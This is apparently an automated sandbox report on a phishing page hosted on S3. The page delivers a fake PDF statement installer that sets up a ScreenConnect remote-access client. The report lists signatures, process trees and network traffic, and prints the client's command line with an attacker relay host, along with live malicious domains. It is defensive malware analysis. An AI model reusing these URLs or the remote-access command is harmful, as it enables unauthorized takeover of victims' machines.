Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html

Overview

General Information

Sample URL:https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html
Analysis ID:1563384
Infos:

Detection

ScreenConnect Tool
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Changes security center settings (notifications, updates, antivirus, firewall)
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3128 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe (PID: 7888 cmdline: "C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe" MD5: BC18A1EC3E55E1646E34A755AB33F245)
      • msiexec.exe (PID: 7956 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • chrome.exe (PID: 6492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1608 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 3736 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7204 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7344 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 1948 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 1956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7404 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 7992 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 8036 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7EE86E0B1933AB805D756378B6788F55 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 8092 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI67F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5138515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 8160 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 035924D4E1C9F612A4EFA7D56997A0B8 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7232 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5F4150FA748054945E832E08AD4D9221 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 3928 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tmqw21a.zapto.org&p=8041&s=2bb258fa-13a9-41c5-bd5b-67ab96b0c2b1&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&i=Amazon" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 6412 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "4d74424a-3cf2-4271-8dfa-4faa9bc7cc7b" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • rundll32.exe (PID: 1940 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Windows\Installer\MSI719A.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Users\user\Downloads\Unconfirmed 701254.crdownloadJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\MSI719A.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            0000000C.00000002.1484985430.0000000005D20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000014.00000000.1517220896.0000000000A72000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                0000000C.00000000.1466317560.00000000009A6000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000C.00000002.1476357184.0000000003441000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    00000014.00000002.2397940469.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (e6cb77284cf765aa) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7992, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\(Default)
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6512, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results
                      Source: https://electroagrotech.com.ua/wp-content/uploads/elementor/css/HTTP Parser: Base64 decoded: {"bulletin_link_id":100,"uri":"bp2:click","bulletin_id":"20220807.61905161","url":"https://www.ssa.gov/?utm_campaign=oest-workloadmanage-22&utm_content=logo&utm_medium=email&utm_source=govdelivery"}
                      Source: https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlHTTP Parser: No favicon
                      Source: https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.htmlHTTP Parser: No favicon
                      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49729 version: TLS 1.2
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:
                      Source: C:\Windows\System32\svchost.exeFile opened: d:
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:
                      Source: C:\Windows\System32\svchost.exeFile opened: c:
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:

                      Networking

                      barindex
                      Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL Service
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                      Source: global trafficDNS traffic detected: DNS query: cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com
                      Source: global trafficDNS traffic detected: DNS query: silvervalleyrealestategh.com
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: electroagrotech.com.ua
                      Source: global trafficDNS traffic detected: DNS query: ci3.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: rjpanelplus.top
                      Source: global trafficDNS traffic detected: DNS query: tmqw21a.zapto.org
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49729 version: TLS 1.2

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4e6ecb.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI719A.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71AB.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73FE.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4e6ecd.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4e6ecd.msi
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}.SchedServiceConfig.rmi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}\DefaultIcon
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI71AB.tmp
                      Source: classification engineClassification label: mal64.evad.win@49/41@23/135
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1956:120:WilError_03
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMutant created: NULL
                      Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnect
                      Source: C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI67F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5138515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3128 --field-trial-handle=1964,i,8661120160449069198,5906582643520789039,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
